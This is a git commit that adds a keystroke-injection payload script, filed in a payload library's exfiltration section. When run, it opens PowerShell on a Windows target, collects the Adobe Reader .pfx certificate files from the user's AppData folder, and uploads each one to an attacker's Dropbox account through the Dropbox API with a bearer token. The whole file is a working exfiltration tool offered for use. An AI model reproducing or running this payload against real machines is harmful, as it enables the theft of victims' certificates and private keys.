Export all saved certificates with Adobe Reader

2023-06-12 14:41:56 +02:00 · 2023-06-12 14:41:56 +02:00 · 0d0c2668c0
parent 716a6bd80b
commit 0d0c2668c0
1 changed files with 55 additions and 0 deletions
--- a/payloads/library/exfiltration/Export_all_saved_certificates_with_Adobe_Reader/payload.txt
+++ b/payloads/library/exfiltration/Export_all_saved_certificates_with_Adobe_Reader/payload.txt
@ -0,0 +1,55 @@
 REM ####################################################################
 REM #                                                                  |
 REM # Title        : Export all saved certificates with Adobe Reader   |
 REM # Author       : Aleff                                             |
 REM # Version      : 1.0                                               |
 REM # Category     : Exfiltration                                      |
 REM # Target       : Windows 10-11                                     |
 REM #                                                                  |
 REM ####################################################################
 REM Requirements:
 REM     - Adobe Reader must be installed
 REM     - Internet Connection
 REM You must define your Dropbox accessToken or modify the exfiltration modality.
 DEFINE DROPBOX_ACCESS_TOKEN example
 GUI r
 DELAY 1000
 STRING PowerShell
 DELAY 2000
 REM Settings about Adobe Reader
 STRINGLN
    $roamingFolderPath = [Environment]::GetFolderPath('ApplicationData')
    $securityFolderPath = Join-Path -Path $roamingFolderPath -ChildPath 'Adobe\Acrobat\DC\Security'
    $pfxFiles = Get-ChildItem -Path $securityFolderPath -Filter '*.pfx' -File
 END_STRINGLN
 REM Setting about exfiltration
 STRING $accessToken = "
 STRING DROPBOX_ACCESS_TOKEN
 STRING "
 ENTER
 STRINGLN
    $authHeader = @{Authorization = "Bearer $accessToken"}
    $uploadUrl = "https://content.dropboxapi.com/2/files/upload"
    foreach ($file in $pfxFiles) {
        $dropboxFilePath = "/$file"
        $headers = @{}
        $headers.Add("Authorization", "Bearer $accessToken")
        $headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')
        $headers.Add("Content-Type", "application/octet-stream")
        Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $file
    }
    exit    
 END_STRINGLN